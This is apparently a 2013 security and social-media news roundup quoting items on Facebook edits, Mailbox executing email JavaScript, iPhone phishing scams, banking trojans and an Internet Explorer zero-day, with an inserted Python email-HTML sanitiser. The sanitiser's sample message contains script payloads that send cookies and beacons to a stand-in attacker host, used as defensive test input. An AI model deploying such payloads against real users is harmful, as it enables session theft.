September, 2013:

Facebook has implemented a new EDIT feature (that offers an audit trail) … Originally, posts were locked down so that likes or responses would stay in line with the original post (primarily to prevent pranksters from changing the content of a message to the opposite meaning).

QUOTE: If you’ve ever posted something on Facebook that you’ve immediately wanted to tweak or correct, Facebook has a solution for you. This week, the site announced that it would roll out a new feature for its web platform and Android Facebook app allowing users to edit posts and comments. Facebook, a lightning rod of privacy issues lately, has already addressed many people’s primary concern with this feature. Facebook will mark posts that have been edited and allow users to see a history of the changes made to the content. This will prevent users from being suckered into liking a post that is edited after the fact.

QUOTE: This week on Mobile Threat Monday, we look at two mobile issues related to Apple products—though, interestingly, one of them is on Android. The good news is that both of the two stories we’re highlighting today have already been solved, but the bad news is that they existed in the first place.

1. iMessage Chat — Apple’s iMessage is the system that allows users to send text messages to other iOS users over Wi-Fi or data network. It’s an appealing service since it’s free, automatic, and syncs with iMessage on OS X (and also can’t be read by the FBI, though that’s up for debate), but it does leave Android users out in the cold.

2. Mailbox JavaScript — Mailbox is the iOS email app that soft-launched with an enormous waiting list. Mailbox has been extremely popular on iOS and is now open to everyone. The app’s reputation took a bit of a hit last week when it was revealed that Mailbox would execute JavaScript in emails without the user’s permission. The issue was apparently discovered by several security watchdogs, though Michele Spagnuolo’s breakdown of the issue made headlines.
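The Mailbox item above describes a mail client executing JavaScript embedded in message HTML. What follows is an added example, not Mailbox's own code or its actual fix, of the usual client-side defence: rebuild the message body from an allowlist of tags and attributes, dropping script elements, `on*` event handlers and `javascript:` URLs, before the HTML reaches a web view. The class and function names (`EmailSanitizer`, `sanitize_email_html`, `is_safe_url`) and the sample message are constructed for this illustration.

```python
"""
Allowlist sanitiser for HTML e-mail bodies (added example; not Mailbox's
own code). It assumes the mail client renders message HTML in a
browser-style web view that would otherwise execute any script the sender
included, and rebuilds the document from an allowlist before rendering.
Names and the sample message below are constructed for this example.
"""
from html import escape
from html.parser import HTMLParser

ALLOWED_TAGS = {"p", "br", "b", "i", "u", "em", "strong", "a", "ul", "ol", "li",
                "div", "span", "h1", "h2", "h3", "blockquote", "img",
                "table", "tr", "td", "th"}
ALLOWED_ATTRS = {"a": {"href", "title"}, "img": {"src", "alt", "width", "height"}}
VOID_TAGS = {"br", "img"}
# These elements are removed together with everything inside them.
DROP_CONTENT_TAGS = {"script", "style", "iframe", "object", "embed", "noscript"}
SAFE_SCHEMES = ("http://", "https://", "mailto:", "cid:")


def is_safe_url(value):
    """Accept only absolute URLs with a known-harmless scheme.

    Whitespace and control characters are stripped first, because browsers
    ignore them inside a scheme ("jav\\tascript:" still runs as javascript:).
    """
    cleaned = "".join(ch for ch in value if ord(ch) > 32).lower()
    return cleaned.startswith(SAFE_SCHEMES)


class EmailSanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []          # sanitised HTML fragments
        self.dropped = []      # what was removed, useful for logging/telemetry
        self._skip_depth = 0   # > 0 while inside an element whose content is dropped

    def handle_starttag(self, tag, attrs):
        if self._skip_depth:
            if tag in DROP_CONTENT_TAGS:
                self._skip_depth += 1
            return
        if tag in DROP_CONTENT_TAGS:
            self._skip_depth = 1
            self.dropped.append(f"<{tag}>")
            return
        if tag not in ALLOWED_TAGS:
            self.dropped.append(f"<{tag}>")   # tag removed, its text still flows through
            return
        kept = []
        for name, value in attrs:
            name = name.lower()
            value = value or ""
            # on* handlers are never allowed, whatever the tag
            if name.startswith("on") or name not in ALLOWED_ATTRS.get(tag, set()):
                self.dropped.append(f"{tag}@{name}")
                continue
            if name in ("href", "src") and not is_safe_url(value):
                self.dropped.append(f"{tag}@{name}={value!r}")
                continue
            kept.append(f' {name}="{escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if self._skip_depth:
            if tag in DROP_CONTENT_TAGS:
                self._skip_depth -= 1
            return
        if tag in ALLOWED_TAGS and tag not in VOID_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self._skip_depth:
            # convert_charrefs decoded entities on the way in; re-encode on the way out
            self.out.append(escape(data, quote=False))

    def handle_comment(self, data):
        pass  # comments (including IE conditional comments) are dropped


def sanitize_email_html(html):
    """Return (clean_html, dropped) for an untrusted HTML message body."""
    parser = EmailSanitizer()
    parser.feed(html)
    parser.close()
    return "".join(parser.out), parser.dropped


# Constructed sample message mixing legitimate markup with script-bearing tricks.
SAMPLE_EMAIL = """<p>Your package has <b>shipped</b>.</p>
<script>document.location='http://evil.example/?c='+document.cookie</script>
<img src="cid:logo" onerror="fetch('http://evil.example/beacon')">
<a href="jav&#x09;ascript:alert(1)">Track shipment</a>
<a href="https://example.com/track">Track shipment</a>
<iframe src="http://evil.example/"></iframe>"""

if __name__ == "__main__":
    clean, dropped = sanitize_email_html(SAMPLE_EMAIL)
    print(clean)
    print("dropped:", dropped)
```

The sanitiser also returns what it removed, so a client can log or count script-bearing messages. Stripping is one layer only: the web view that renders mail should additionally have script execution disabled, so that a sanitiser bug does not turn into code execution.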

QUOTE: Apple unveiled details of its long-awaited new iPhone models this week, announcing the iPhone 5S and the iPhone 5C. While the impending September 20 release date for the phones has been a cause for celebration online, social media users should beware of fake offers for new iPhones cropping up on Facebook. In fact, as Trend Micro reports, these spam messages have already been appearing in users’ inboxes. The emails attempt to look like an Apple Store notification email and tell users that they’ve “won” the iPhone 5S plus an iPad. A link in the email then takes users to another website, where they’re asked to input their email address and password. So far, the scam has spread across southeastern Asia, though as the buzz around the new phones increases as the release date draws nearer, Facebook users around the world can expect to see more of these same kinds of scams.

QUOTE: Facebook is constantly seeking ways to better analyze its users’ posts and find ways to target its advertising and content. Last week, it was revealed that the site is investigating deep learning (i.e., artificial intelligence) techniques that can create a “simulated neural network” to better understand the emotions behind users’ posts and better sort their News Feed. The system is a massive network of interconnected computers intended to simulate the human brain with learning algorithms. “Research into understanding images, text, and language has been going on for decades, but the typical improvement a new technique might offer was a fraction of a percent,” Facebook’s chief technology officer, Mike Schroepfer, told the MIT Technology Review. “In tasks like vision or speech, we’re seeing 30 percent-plus improvements with deep learning… The data set is increasing in size, people are getting more friends, and with the advent of mobile, people are online more frequently.”

QUOTE: A stealthy banking Trojan known as Caphaw or Shylock has resurfaced – and is attacking customers of 24 American banks. It’s armed with defensive and stealth abilities including the power to “restore” itself during shutdown. The malware is described as “one of the few that can steal money while a user is accessing his bank account,” by ESET Security Intelligence Team Lead, Aleksandr Matrosov, who published a detailed analysis of the malware this year.

“It is an interesting financial malware family: one of the few that has autoload functionality for automatically stealing money when the user is actively accessing his banking account. An infected user can’t recognize that his money is being stolen,” Matrosov writes. “This threat has many techniques for bypassing security software and evading automated malware samples processing.” Zscaler said in a blog post, “Over the last month, the ThreatLabZ researchers have been actively monitoring a recent uptick in the numbers of Win32/Caphaw (henceforward known as Caphaw) infections that have been actively targeting users’ bank accounts since 2011.”

QUOTE: There is a new bot on the block. ESET identifies it as Win32/Napolar while its author calls it solarbot. This piece of malware came to our attention mid-August because of its interesting anti-debugging and code injection techniques. It recently attracted general attention when it was discussed on various reverse engineering forums. This malware can serve multiple purposes. The three main ones are to conduct Denial of Service attacks, to act as a SOCKS proxy server, and to steal information from infected systems. The malware is able to hook into various browsers to steal information that is submitted in web forms.

We have uncovered many details about this bot since it became active at the end of July, with in-the-wild infections starting mid-August. There have been reports of thousands of infections, many of them in South America. The countries with the most infections are Peru, Ecuador, and Colombia. More information on the geographical distribution for this threat can be found on virusradar. The author of Win32/Napolar uses a website to promote it. The website looks very professional and contains detailed information about the bot, including the cost ($200 USD for each build) and even a complete change-log of the evolution of the code. Although we have not yet directly seen Win32/Napolar being distributed in the wild, it seems likely that this threat has been spread through Facebook.

QUOTE: Last year, ESET mentioned a TDL4 variant (some AV vendors refer to it as Pihar) that employs new techniques to bypass HIPS as well as to elevate a process’s privileges to gain administrator access. The droppers of the variants we recently saw also use the same techniques mentioned in ESET’s blog post, but with some minor updates. TDL4 exploits the MS10-092 vulnerability in the Microsoft Windows Task Scheduler service to elevate the malware’s process privileges in order to load the rootkit driver. The new variants instead exploit the CVE-2013-3660 EPATHOBJ vulnerability discovered by security researcher Tavis Ormandy.

The feature works when users decide to purchase or download an item via an ecommerce app and add it to their shopping cart. At that point, if the user has already uploaded their credit card information to Facebook via a Facebook Gift, credit or in-game purchase, they are presented with a button that allows them to autofill their financial info via Facebook. Facebook is essentially acting as a middle-man between users and the ecommerce businesses they’re purchasing from, but it could be the first step in a greater move by Facebook toward ecommerce technology of their own.

QUOTE: The Internet Storm Center is beginning to see increased evidence of exploits in the wild regarding Microsoft Security Advisory 2887505. Accordingly, we’re moving the InfoCon up to Yellow. Microsoft is investigating public reports of a vulnerability in all supported versions of Internet Explorer. Microsoft is aware of targeted attacks that attempt to exploit this vulnerability in Internet Explorer 8 and Internet Explorer 9. Applying the Microsoft Fix it solution, CVE-2013-3893 Fix It Workaround, prevents the exploitation of this issue. This Fix It solution also includes EMET 4.0 guidance.

QUOTE: On September 17, Microsoft issued an advisory reporting a new zero-day vulnerability in Internet Explorer: Microsoft Internet Explorer Memory Corruption Vulnerability (CVE-2013-3893). The advisory states that the vulnerability may corrupt memory in a way that could allow attackers to execute arbitrary code. The attack works by enticing users to visit specially crafted websites that host the vulnerability through Internet Explorer. Microsoft also states that at this time the vulnerability is known to be exploited in only a limited number of targeted attacks. While Microsoft is yet to release a patch for this vulnerability, they have provided a temporary “Fix It” tool solution as a workaround until a security update is made available.